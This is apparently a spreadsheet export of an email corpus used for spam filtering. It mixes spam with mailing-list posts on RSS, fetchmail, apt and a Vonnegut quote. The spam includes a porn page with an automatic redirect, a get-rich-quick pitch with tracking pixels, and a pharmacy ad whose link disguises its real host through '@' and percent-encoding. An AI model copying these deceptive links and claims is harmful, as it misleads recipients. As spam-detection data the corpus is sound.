 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
 ------=_NextPart_w06gnvwSMBJCZhhJJKsn0sSgc1kn--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Jon Hanna, on the RSS-DEV list, says that RSS, was "not designed
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/25#When:6:25:23AM
 Date: Wed, 25 Sep 2002 13:25:23 GMT
 Jon Hanna, on the RSS-DEV list, says[1] that RSS, was "not designed to be of 
 any particular use to bloggers, aggregators, or metadata providers." This is 
 not true. Half of RSS 0.91 was scriptingNews format[2], which was totally 
 designed to model a weblog in XML. 
 [1] http://groups.yahoo.com/group/rss-dev/message/4023
 [2] http://my.userland.com/stories/storyReader$11
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: DONYA Photo's                         23758
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;BODY&gt;
 &lt;/head&gt;
 &lt;BODY&gt;
 &lt;p&gt;.&amp;nbsp;&amp;nbsp; These are REAL people with REAL livecameras and movies!&lt;a href="http://www.damiansangels.com/accounts/hosting/anna"&gt;http://www.damiansangelz.com/accounts/hosting/anna&lt;/a&gt;&amp;nbsp;&lt;br&gt;
 Why not come take a look for yourself??&lt;/p&gt;
 &lt;br&gt;
          If you have questions&lt;br&gt;
         please contact me&lt;/font&gt;&lt;font size="1" face="Arial, Helvetica, sans-serif"&gt;&lt;br&gt;
         &lt;a href="http://hot10.website-hoster.com/takemeoff.html"&gt;Click here to
         avoid this in the future &lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;/BODY&gt;&lt;/HTML&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;
 &lt;HTML&gt;&lt;p&gt;&lt;head&gt;&lt;p&gt;&lt;META HTTP-EQUIV=Refresh CONTENT="02; URL=http://www.damiansangels.com/accounts/hosting/anna"&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Stay at Home Business-24 hr Support!
</t>
  </si>
  <si>
    <t xml:space="preserve">--##########
 See below for your Exit Information.
 ============================================================================================================
 Dear Friend, 
 You're about to discover how you can have FIVE of your own Internet businesses set up and taking orders within 29 minutes...for less than half of what most people spend on groceries! 
 I'd like for you to know up front that I'm not an Internet Guru...Not A Computer Wiz...And Not A Marketing Genius. 
 First of all, I'll admit that I don't expect you to believe a single word I say. 
 After all, how many times a day are you BOMBARDED with some lame "get-rich-quick" scheme on the Internet? 
 You probably get a brand new promise of instant wealth every few hours in your e-mail box and if you're anything like me, you've tried a few and been left with nothing but a hole in your pocket! Well, I've got great news for you. 
 Now you too can make great money right from your home with your own auto-pilot "Internet Empire"! 
 But before we get into that, let me prove to you that I'm actually doing it and that you can too... 
 - Free Cash Generating Websites! 
 - Full Resell Rights! 
 - You keep 100% on every sale! 
 - Live customer support! 
 Urgent! 
 Order the program right now and we will email you our toll free support number! 
 Unconditional, No-Risk Guarantee!! 
 Cut and Paste this address into your browser to order NOW!! http://results.reliatrack.com/select.php?pos=99000221689&amp;active=9852999
 ============================================================================================================
 Your email address has been submitted to The PermissionPass Network for mailing by one of our merchant clients, or included as part of an assets purchase.  You may permanently remove yourself at http://www.permissionpass.com/optout.php?email=jm@netnoteinc.com&amp;pos=99000221689.  Thank you..
 - PermissionPass.com
 --##########
 Content-Type: text/html
 Content-Transfer-Encoding: 7bit
 Content-Disposition: inline
 &lt;table&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;font face="arial" size="1"&gt;&lt;u&gt;See below for your Exit Information.&lt;/U&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TD&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://results.reliatrack.com/active.php?xactive=99000221689&amp;yactive=http://results.reliatrack.com/active.gif" height="1" width="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/TABLE&gt;
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"&gt;&lt;html&gt;&lt;head&gt; &lt;title&gt;Untitled&lt;/title&gt;&lt;/head&gt;&lt;body bgcolor="ffffff" text="00000" link="0000cc" vlink="cc00cc" alink="cc0000" topmargin="0" leftmargin="0" bottommargin="0" rightmargin="0" marginheight="0" marginwidth="0"&gt;&lt;br&gt;&lt;center&gt;&lt;a href="http://results.reliatrack.com/select.php?pos=99000221689&amp;active=4428139"&gt;&lt;img src="http://netsuccessnow.com/banners/ieMailer/top.jpg" width="500" height="134" alt="" border="0"&gt;&lt;/a&gt;&lt;/center&gt;&lt;table border=0 cellpadding=0 cellspacing=0 width=500 align="center"&gt;&lt;tr&gt; &lt;td width=1 bgcolor="000000"&gt;&lt;img src="http://netsuccessnow.com/banners/ieMailer/a.gif" width=1 height=1 border=0 alt=""&gt;&lt;/td&gt; &lt;td width=498 bgcolor="F6FEE1"&gt; &lt;center&gt;&lt;img src="http://netsuccessnow.com/banners/ieMailer/a.gif" width=498 height=1 border=0 alt=""&gt;&lt;/center&gt; 
 &lt;table border=0 cellpadding=0 cellspacing=0 width=498&gt; 
 &lt;tr&gt; 
 &lt;td align="center"&gt;
 &lt;a href="http://results.reliatrack.com/select.php?pos=99000221689&amp;active=4428139"&gt;&lt;img src="http://netsuccessnow.com/banners/ieMailer/text1.gif" width="213" height="94" alt="" border="0"&gt;&lt;/a&gt;&lt;/td&gt; 
 &lt;td align="center"&gt;&lt;a href="http://results.reliatrack.com/select.php?pos=99000221689&amp;active=4428139"&gt;&lt;img src="http://netsuccessnow.com/banners/ieMailer/everything.jpg" alt="" width="254" height="107" border="0"&gt;&lt;/a&gt;&lt;/td&gt; 
 &lt;/tr&gt; 
 &lt;tr&gt;&lt;td colspan=2 align="center"&gt;&lt;a href="http://results.reliatrack.com/select.php?pos=99000221689&amp;active=4428139"&gt;&lt;img src="http://netsuccessnow.com/banners/ieMailer/text2.gif" width="413" height="69" alt="" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt; 
 &lt;/table&gt; 
 &lt;/td&gt;
 &lt;td width=1 bgcolor="000000"&gt;
 &lt;img src="http://netsuccessnow.com/banners/ieMailer/a.gif" width=1 height=1 border=0 alt=""&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;&lt;center&gt;&lt;a href="http://results.reliatrack.com/select.php?pos=99000221689&amp;active=4428139"&gt;
 &lt;img src="http://netsuccessnow.com/banners/ieMailer/bottom.jpg" width="500" height="130" alt="" border="0"&gt;&lt;/a&gt;&lt;/center&gt;
 &lt;br&gt;
 &lt;/body&gt;
 &lt;/html&gt; 
 &lt;!--08Pt6--&gt;&lt;table&gt;
 &lt;tr&gt;
 &lt;!--99000221689/8--&gt;
 &lt;td&gt;&lt;font color="black" face="arial" size="1"&gt;
 Your email address has been submitted to The PermissionPass Network for mailing by one of our merchant clients, or included as part of an assets purchase.  You may permanently remove yourself by clicking &lt;a href="http://www.permissionpass.com/optout.php?email=jm@netnoteinc.com&amp;pos=99000221689"&gt;HERE&lt;/a&gt;.  Thank you.
 &lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 --##########--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: PLEASURE YOUR WOMEN FOR HOURS WITH VIAGRA 6269
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;
 &lt;BODY&gt;
 &lt;body&gt;
 &lt;table border=3D"0" cellpadding=3D"0" style=3D"mso-cellspacing: 1.5pt" hei=
 ght=3D"584"&gt;
   &lt;tr&gt;
     &lt;td style=3D"padding: .75pt" height=3D"582"&gt;
       &lt;center&gt;
       &lt;table width=3D"400"&gt;
         &lt;tr&gt;
           &lt;td align=3D"center" valign=3D"middle" bgcolor=3D"#408080"&gt;
             &lt;table cellpadding=3D"0" cellspacing=3D"0"&gt;
               &lt;tr&gt;
                 &lt;td align=3D"center" valign=3D"middle" bgcolor=3D"#8080C0"=
 &gt;&lt;font size=3D"+4" face=3D"Arial" color=3D"white"&gt;&lt;b&gt;&amp;nbsp;VIAGRA&lt;/b&gt;&lt;/fon=
 t&gt;&lt;/td&gt;
                 &lt;td bgcolor=3D"#8080C0" align=3D"left"&gt;&lt;sup&gt;&lt;font size=3D"=
 1" color=3D"white"&gt;TM
                   &lt;/font&gt;&lt;/sup&gt;&amp;nbsp;&lt;br&gt;
                   &lt;br&gt;
                   &lt;br&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;font size=3D"+1" color=3D"#408080" face=3D"Arial"&gt;Is the breakthrou=
 gh
       medication that has restored&lt;br&gt;
       or enhanced the Sex lives of millions of men.&lt;/font&gt;
       &lt;p&gt;&lt;font size=3D"+1" color=3D"#400080" face=3D"Arial"&gt;Is available t=
 o you online
       and&lt;br&gt;
       &lt;b&gt;Fed&lt;font size=3D"+1" color=3D"#FF8040" face=3D"Arial"&gt;Ex&lt;/font&gt;&lt;/=
 b&gt;&lt;sup&gt;&lt;font size=3D"-1"&gt;tm&lt;/font&gt;&lt;/sup&gt;
       delivered to your mailbox at
       &lt;p&gt;&lt;b&gt;&lt;font size=3D"+1" color=3D"red" face=3D"Arial"&gt;LOWEST PRICES&lt;/=
 font&gt;
       &lt;/b&gt;&lt;/font&gt;&lt;b&gt;&lt;font size=3D"+1" color=3D"red" face=3D"Arial"&gt; ANYWHE=
 RE&lt;/font&gt;&lt;/b&gt;&lt;font size=3D"+1" color=3D"#400080" face=3D"Arial"&gt;&lt;p&gt;Plus we=
  offer&lt;br&gt;
       &lt;/font&gt;&lt;font size=3D"+1" color=3D"red" face=3D"Arial"&gt;&lt;b&gt;P H E N T E=
  R M I N E&lt;/b&gt;&lt;/font&gt;&lt;font size=3D"+1" color=3D"#400080" face=3D"Arial"&gt;&lt;b=
 r&gt;
       &lt;/font&gt;&lt;font size=3D"3" color=3D"#400080" face=3D"Arial"&gt;The World R=
 enown Weight
       Loss Miracle Pill.&lt;/font&gt;
       &lt;p&gt;&lt;font size=3D"+1" color=3D"#400080" face=3D"Arial"&gt;Online Orderin=
 g is&lt;br&gt;
       Convenient, Affordable and Confidential&lt;/font&gt;&lt;font size=3D"3" color=
 =3D"#400080" face=3D"Arial"&gt;.&lt;/font&gt;&lt;font size=3D"+1" color=3D"#400080" fa=
 ce=3D"Arial"&gt;
       &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font color=3D"red" face=3D"Verdana" size=3D"=
 5"&gt;&amp;nbsp; &lt;/font&gt;&lt;font color=3D"red" face=3D"Book Antiqua" size=3D"5"&gt;For =
 More
       &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;b&gt;&lt;font color=3D"red" face=3D"Book Antiqua" size=3D=
 "5"&gt;Savings
       &lt;/font&gt;&lt;font size=3D"+1" color=3D"#400080" face=3D"Arial"&gt;&lt;font colo=
 r=3D"red" face=3D"Book Antiqua" size=3D"5"&gt;Info.&lt;br&gt;
       &lt;/font&gt;&lt;/font&gt;&lt;font face=3D"VERDANA,ARIAL" color=3D"#0000a0" size=3D=
 "2"&gt;Please
       Become One Of Our Many&lt;br&gt;
       &amp;nbsp;&lt;br&gt;
       &lt;/font&gt;&lt;font face=3D"VERDANA,ARIAL" size=3D"2" color=3D"#0000A0"&gt;&lt;br=
 &gt;
       &lt;/font&gt;&lt;font face=3D"VERDANA,ARIAL" size=3D"2" color=3D"#0000FF"&gt;We =
 are your online pharmacy for
       &lt;u&gt; FDA approved drugs&lt;/u&gt;&lt;br&gt;
       &amp;nbsp;through FREE online consultation. We offer the widest&amp;nbsp;&lt;br=
 &gt;
  range of drugs available through online ordering.&lt;/font&gt;&lt;font face=3D"VER=
 DANA,ARIAL" color=3D"#0000a0" size=3D"2"&gt;&amp;nbsp;&lt;br&gt;
       &lt;br&gt;
       &lt;/font&gt;&lt;font face=3D"VERDANA,ARIAL" color=3D"#0000a0" size=3D"2"&gt;&lt;br=
 &gt;
       We
       have the Lowest Priced Viagra On The Internet.&amp;nbsp;&lt;br&gt;
       &lt;/font&gt;&lt;/b&gt;
       &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"VERDANA,ARIAL" color=3D"#0000FF=
 " size=3D"2"&gt;
       &lt;br&gt;
       &amp;nbsp; &lt;/font&gt;&lt;font face=3D"VERDANA,ARIAL" size=3D"3" color=3D"#FF00=
 00"&gt;For The
       Perfect Experience&lt;u&gt;&lt;br&gt;
       &lt;/u&gt;&lt;/font&gt;&lt;/b&gt;
       &lt;font size=3D"5" color=3D"#0000A0"&gt;&lt;b&gt;&lt;a href=3D"http://36.32.34.2-3=
 4368.2.33--kjwds3134-flwire.net.htm@%70%69%6C%6C%73%74%6F%72%65%2E%63%6F%6=
 D/%73%74%6F%72%65/pdaaxwipqwmsrp?redirect=3Dwww.angelfire.com/me3/power92/=
 index.htmlm"&gt;
       Click Here and Revitalize Your Life.&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;
       &lt;p align=3D"center"&gt;&amp;nbsp;
       &lt;p align=3D"center"&gt;&lt;/center&gt;&lt;span style=3D"font-size:7.5pt;font-fam=
 ily:Arial;
   color:black"&gt;&lt;b&gt;To be removed&amp;nbsp;put your email address in the body&lt;/b=
 &gt;&lt;/span&gt;&lt;b&gt;&lt;span style=3D"font-size:7.5pt;font-family:Arial;
   color:black"&gt; of the email along with&lt;br&gt;
       &amp;nbsp;the words &amp;quot;user inactiv*e&amp;quot; without the * by just cli=
 cking &lt;/span&gt;&lt;a href=3D"mailto:vfgosetveen@yahoo.com"&gt;&lt;font size=3D"1" col=
 or=3D"#0000FF"&gt;&lt;span style=3D"font-family: Arial"&gt;Remove Me &lt;/span&gt;&lt;/font&gt;=
 &lt;/a&gt;&lt;/b&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;******
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Sure, the *object* of a particular head of lettuce may be unique, but 
 we're not tracking lettuce heads -- we're tracking the *idea* of a 
 lettuce head in a capitalist system, an ownership relation.
 Besides, in the worst case, these damn object ID's aren't very 
 compressible. Best representation of a unique head of lettuce I can 
 think of is... that very head of lettuce.
 Of course, an accumulator is much easier to write, since the Pauli 
 Exclusion Principle guarantees that adding a head of lettuce to a bin is 
 an _atomic operation_
 :-)
 Rohit
 On Monday, August 12, 2002, at 09:56  PM, Damien Morton wrote:
 &gt;
 &gt; How about a highly error corrected atomic level 3D encoding scheme that
 &gt; relies on shape, colour and chemical make up to uniquely identify every
 &gt; object in the universe.
 &gt;
 &gt; Objects uniquely identify themselves - theres no need for barcodes.
 &gt;
 &gt;
 &gt; http://xent.com/mailman/listinfo/fork
 &gt;
 ---
 My permanent email address is khare@alumni.caltech.edu
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Tryst of Fate
</t>
  </si>
  <si>
    <t xml:space="preserve">. . . or eventuality: Bush and Cheney fuck each other when the rest of the nation suddenly becomes unavailable.
 http://www.hfcletter.com/letter/August02/
 gg
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Wear Sunscreen
</t>
  </si>
  <si>
    <t xml:space="preserve">
 "Yes, and Eliza and I composed a precocious critique of the Constitution
 of the United States of America, too. We argued that it was as good a
 scheme for misery as any, since its success in keeping the common people
 reasonably happy and proud depended on the strength of the people
 themselves - and yet it described no practical machinery which would tend
 to make the people, as opposed to their elected representatives, strong.
     We said it was possible that the framers of the Constitution were
 blind to the beauty of persons who were without great wealth or powerful
 friends or public office, but who were nonetheless genuinely strong.
     We thought it was more likely, though, that the framers had not
 noticed that it was natural, and therefore almost inevitable, that human
 beings in extraordinary and enduring situations should think of themselves
 as composing new families. Eliza and I pointed out that this happened no
 less in democracies than in tyrannies, since human beings were the same
 the wide world over, and civilized only yesterday.
     Elected representatives, hence, could be expected to become members of
 the famous and powerful family of elected representatives - which would,
 perfectly naturally, make them wary and squeamish and stingy with respect
 to all the other sorts of families which, again, perfectly naturally,
 subdivided mankind.
     Eliza and I, thinking as halves of a single genius, proposed that the
 Constitution be amended so as to guarantee that every citizen, no matter
 how humble or crazy or incompetent or deformed, somehow be given
 membership in some family as covertly xenophobic and crafty as the one
 their public servants formed.
     Good for Eliza and me!
     Hi ho."
 Kurt V
 Slapstick
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Wear Sunscreen
</t>
  </si>
  <si>
    <t xml:space="preserve">Tom wrote:
 &gt;     Eliza and I, thinking as halves of a single genius, proposed that the
 &gt; Constitution be amended so as to guarantee that every citizen, no matter
 &gt; how humble or crazy or incompetent or deformed, somehow be given
 &gt; membership in some family as covertly xenophobic and crafty as the one
 &gt; their public servants formed.
 That was Such a Fucking Depressing Book.
 I must have read it seven or eight times.
 - Joe Daisy-38 Barrera.
 -- 
 Left behind the bars
 Rows of Bishops' heads in jars
 And a bomb inside a car
 Spectacular, spectacular
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Retrieving read mail from webmail.eircom.net via POP ?
</t>
  </si>
  <si>
    <t xml:space="preserve">Is there a way to get my read email downloaded off webmail.eircom.net.
 I've been reading the emails using the web based interface. But I've
 reached my quota limit. There doesn't seem to be any way to get the
 emails off the server. I can connect to the account using POP, but that
 only retrieves unread emails. There's also no way to mark emails as
 unread from the html interface.
 Is there a way I can use fetchmail perhaps to get it to pull down all
 the emails and remove them off the server.
 It's been years since I've used fetchmail, I don't recall be able to do
 this.
 Any other suggestions welcome. There's a few hundred email so I don't
 fancy going through each one forwarding it to another account.
 Glen
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">͂ĂԂǂ
 ݂Ƃ̃R{[V
 [^rfIicucj
 _x0082_܂ŉcƂł邩킩܂
 ͂߂ɁI
 http://book-i.net/mutou
 i
 `@Écn9@̓
 ȂǂȂ132iBD]I
 (^-^)/~Fg[
 To Unsubscribe: send mail to majordomo@FreeBSD.org
 with "unsubscribe freebsd-questions" in the body of the message
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Do you owe the IRS money? [p5fi3]
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --J2SCkAp4GZ/dPZZf
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline
 Content-Transfer-Encoding: quoted-printable
 On Fri, Feb 01, 2002 at 04:15:52PM +0100, Matthias Saou wrote:
 &gt; Once upon a time, Harri wrote :
 &gt;=20
 &gt; &gt; &gt; During the past few days, I've experienced connection problems with
 &gt; &gt; &gt; that site from time to time, but for me right now it's working.
 &gt; &gt;=20
 &gt; &gt; Maybe it's temporary :-/
 &gt;=20
 &gt; If you need another apt repository with Red Hat Linux 7.2 files, there are
 &gt; a few others. See : http://freshrpms.net/apt/
 I have a local one for the main and upgrades from somewhere plus my own
 at $ORKPLACE.
 blades@remiel% grep nixia /etc/apt/sources.list=20
 #rpm http://apt.nixia.no redhat/7.2/i386 gnomehide
 #rpm-src  http://apt.nixia.no redhat/7.2/i386 gnomehide
 Ah, that's it. They had newer gnome there
 --=20
 "When life hands you a lemon, make batteries
 =2E...then go electrocute someone."
 	-- Stevo, Scary Devil Monastery
 --J2SCkAp4GZ/dPZZf
 Content-Type: application/pgp-signature
 Content-Disposition: inline
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: For info see http://www.gnupg.org
 iD8DBQE8WrcrQF8Oi9XNck4RAur7AKDDRrfTI/kW7UZ1Vi0WXhPXycX4cwCgyd99
 PcYli3Z2sQrAZPcG5KWF4GY=
 =CkwN
 -----END PGP SIGNATURE-----
 --J2SCkAp4GZ/dPZZf--
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
